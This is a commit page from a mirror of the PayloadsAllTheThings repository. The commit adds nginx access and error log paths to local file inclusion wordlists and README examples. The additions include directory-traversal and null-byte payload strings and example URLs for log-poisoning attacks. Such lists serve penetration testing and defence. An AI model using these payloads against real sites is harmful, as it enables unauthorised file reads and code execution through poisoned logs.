Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add nginx log files for LFI log poisoning

Browse source
This commit is contained in:
Jonas Wendorf 2019-05-30 12:01:24 +02:00
parent f88da43e1c
commit f5702467d6
7 changed files with 42 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
Directory Traversal/README.md
View file

@ -111,6 +111,8 @@ The following log files are controllable and can be included with an evil payloa
/var/log/httpd/error_log /var/log/httpd/error_log
/usr/local/apache/log/error_log /usr/local/apache/log/error_log
/usr/local/apache2/log/error_log /usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log /var/log/vsftpd.log
/var/log/sshd.log /var/log/sshd.log
/var/log/mail /var/log/mail

12
File Inclusion/Intruders/JHADDIX_LFI.txt
View file

@ -666,6 +666,18 @@ users/.htpasswd
/var/log/news/news.notice /var/log/news/news.notice
/var/log/news/suck.err /var/log/news/suck.err
/var/log/news/suck.notice /var/log/news/suck.notice
/var/log/nginx/access_log
/var/log/nginx/access.log
../../../../../../../var/log/nginx/access_log
../../../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/access_log
../../../../../var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log
../../../../../../../var/log/nginx/error_log
../../../../../../../var/log/nginx/error.log
../../../../../var/log/nginx/error_log
../../../../../var/log/nginx/error.log
/var/log/poplog /var/log/poplog
/var/log/POPlog /var/log/POPlog
/var/log/proftpd /var/log/proftpd

4
File Inclusion/Intruders/Linux-files.txt
View file

@ -56,3 +56,7 @@
/var/log/apache/error_log /var/log/apache/error_log
/var/log/httpd/error_log /var/log/httpd/error_log
/var/log/httpd/access_log /var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log

14
File Inclusion/Intruders/List_Of_File_To_Include.txt
View file

@ -765,6 +765,20 @@ php://input
/var/log/mysql/mysql-slow.log /var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log /var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00 /var/log/mysql/mysql-slow.log%00
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log
/var/log/nginx/error_log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error.log
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/var/log/proftpd /var/log/proftpd
/var/log/proftpd /var/log/proftpd
/var/log/proftpd%00 /var/log/proftpd%00

4
File Inclusion/Intruders/List_Of_File_To_Include_NullByteAdded.txt
View file

@ -41,6 +41,10 @@
/var/log/httpd/error_log%00 /var/log/httpd/error_log%00
/var/log/httpd/access_log%00 /var/log/httpd/access_log%00
/var/log/httpd/error_log%00 /var/log/httpd/error_log%00
/var/log/nginx/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error_log%00
/var/log/nginx/error.log%00
/apache/logs/error.log%00 /apache/logs/error.log%00
/apache/logs/access.log%00 /apache/logs/access.log%00
/apache/logs/error.log%00 /apache/logs/error.log%00

2
File Inclusion/Intruders/Mac-files.txt
View file

@ -4,3 +4,5 @@
/var/log/apache2/error_log /var/log/apache2/error_log
/var/log/apache2/access_log /var/log/apache2/access_log
/usr/local/nginx/conf/nginx.conf /usr/local/nginx/conf/nginx.conf
/var/log/nginx/error_log
/var/log/nginx/access_log

2
File Inclusion/README.md
View file

@ -253,6 +253,8 @@ Just append your PHP code into the log file by doing a request to the service (A
```powershell ```powershell
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/mail